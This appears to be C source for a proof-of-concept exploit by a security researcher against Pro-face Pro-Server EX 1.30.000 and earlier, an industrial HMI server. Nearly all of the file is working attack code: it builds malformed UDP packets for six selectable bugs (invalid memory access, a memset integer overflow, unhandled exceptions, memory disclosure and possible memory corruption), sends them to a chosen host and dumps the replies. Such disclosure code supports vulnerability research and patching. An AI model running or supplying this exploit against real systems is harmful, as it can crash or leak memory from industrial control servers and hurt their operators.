/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stricmp strcasecmp
    #define stristr strcasestr
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff  // 2048 on port 8001, 1500 on port 8004



int create_socket(int type, struct sockaddr_in *peer);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *str, int len);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
void show_dump(unsigned char *data, unsigned int len, FILE *stream);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



u8      password[8 + 1] = "";



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            bug,
            len;
    u16     port    = 8001;
    u8      *buff,
            *host,
            *p,
            *x;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Pro-face Pro-Server EX <= 1.30.000 vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " 1 = \"Find Node\" invalid memory access\n"
            " 2 = memset integer overflow\n"
            " 3 = Unhandled exception\n"
            " 4 = Invalid memory read access\n"
            " 5 = Invalid memory                 disclosure\n"
            " 6 = Possible limited memory corruptions\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = create_socket(IPPROTO_UDP, &peer);

    p = buff;
    if(bug == 1) {
        p += putxx(p, 0x62,     8);     // 3a7a9b
        p += putxx(p, 0xff,     8);     // flag 3a7a98
        p += putxx(p, 0xff,     8);     // flag 3a7a99
        p += putxx(p, 0xff,     8);     // flag 3a7a9a
        x = p; p += 4;
        p += putxx(p, 0xffffffff, 32);  // 3a7a90
        p += putxx(p, 0xffffffff, 32);  // 3a7a94
        p += putxx(p, 0x1849b99d, 32);  // (num * 4) + 4 = 0x61616160
        for(i = 0; i < 0; i++) {
            p += putxx(p, 0, 32);
        }
        p += putmm(p, "\x1c" "Find Node\0" "ASP", 14);
        p += putxx(p, 7,        8);     // opcode 0x1b, 0x10, 0x1c, 0x7
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(0xe), 16);
        p += putxx(p, 0x80,     8);
        p += putcc(p, 0xff,     2048 - (p - buff));

    } else if(bug == 2) {
        p += putxx(p, 0x62,     8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        x = p; p += 4;
        p += putxx(p, 7,        8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(5), 16);    // 5 or 6
        p += putxx(p, 0,        8);
        p += putcc(p, 0,        0x11);
        p += putxx(p, htonl(0 - (0x18 + 4)), 32);
        p += putcc(p, 'a',      2048 - (p - buff));

    } else if(bug == 3) {
        p += putxx(p, 0x62,     8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        x = p; p += 4;
        p += putxx(p, 7,        8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(5), 16);    // 5 or 6
        p += putxx(p, 0,        8);
        p += putcc(p, 0,        0x11);
        p += putxx(p, htonl(0x7fffffff), 32);
        p += putcc(p, 'a',      2048 - (p - buff));

    } else if(bug == 4) {
        p += putxx(p, 0x62,     8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        x = p; p += 4;
        p += putxx(p, 7,        8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(0x14), 16);
        p += putxx(p, 0,        8);
        p += putcc(p, 0,        0x11);
        p += putxx(p, htonl(0x7fffffff - 0x18), 32);
        p += putcc(p, 0,        8);
        p += putcc(p, 'a',      2048 - (p - buff));

    } else if(bug == 5) {
        p += putxx(p, 0x62,     8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        x = p; p += 4;
        p += putxx(p, 7,        8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(0x14), 16);
        p += putxx(p, 0,        8);
        p += putcc(p, 0,        0x11);
        p += putxx(p, htonl(3000), 32); // packet size is max 2048
        //ignored p += putcc(p, 0,        8);

    } else if(bug == 6) {
        p += putxx(p, 0x62,     8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        p += putxx(p, 0,        8);
        x = p; p += 4;
        p += putxx(p, 7,        8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, 0xff,     8);
        p += putxx(p, htons(0x14), 16);
        p += putxx(p, 0,        8);
        p += putcc(p, 0,        0x11);
        p += putxx(p, htonl(0), 32);
        //p += putcc(p, 0,        8);
        //p += putcc(p, 'a',      2048 - (p - buff));

    } else {
        printf("\nError: invalid bug number (%d)\n", bug);
        exit(1);
    }

    putxx(x, (p - buff) - 8, 32);
    for(i = 0;; i++) {
        if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();
        if(!timeout(sd, 1)) break;
        if(i >= 1) goto quit;
    }

    for(;;) {
        if(timeout(sd, 1) < 0) break;
        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len <= 0) break;
        show_dump(buff, len, stdout);
    }

quit:
    printf("- done\n");
    close(sd);
    return(0);
}



int create_socket(int type, struct sockaddr_in *peer) {
    static struct linger ling = {1,1};
    static int  on  = 1;
    int     sd;

    if(type == IPPROTO_TCP) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        printf("- connected\n");
    } else {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
    }
    setsockopt(sd, SOL_SOCKET, SO_LINGER,    (char *)&ling, sizeof(ling));
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on,   sizeof(on));
    setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on,   sizeof(on));
    return(sd);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str) + 1;
    memcpy(data, str, len);
    return(len);
}



int putmm(u8 *data, u8 *str, int len) {
    if(len < 0) len = strlen(str);
    memcpy(data, str, len);
    return(len);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        //num |= (data[i] << (i << 3));
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    if(ret) *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = num >> (i << 3);
        data[i] = num >> ((bytes - 1 - i) << 3);
    }
    return(bytes);
}



void show_dump(unsigned char *data, unsigned int len, FILE *stream) {
    static const char       hex[] = "0123456789abcdef";
    static unsigned char    buff[67];   /* HEX  CHAR\n */
    unsigned char           chr,
                            *bytes,
                            *p,
                            *limit,
                            *glimit = data + len;

    memset(buff + 2, ' ', 48);

    while(data < glimit) {
        limit = data + 16;
        if(limit > glimit) {
            limit = glimit;
            memset(buff, ' ', 48);
        }

        p     = buff;
        bytes = p + 50;
        while(data < limit) {
            chr = *data;
            *p++ = hex[chr >> 4];
            *p++ = hex[chr & 15];
            p++;
            *bytes++ = ((chr < ' ') || (chr >= 0x7f)) ? '.' : chr;
            data++;
        }
        *bytes++ = '\n';

        fwrite(buff, bytes - buff, 1, stream);
    }
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


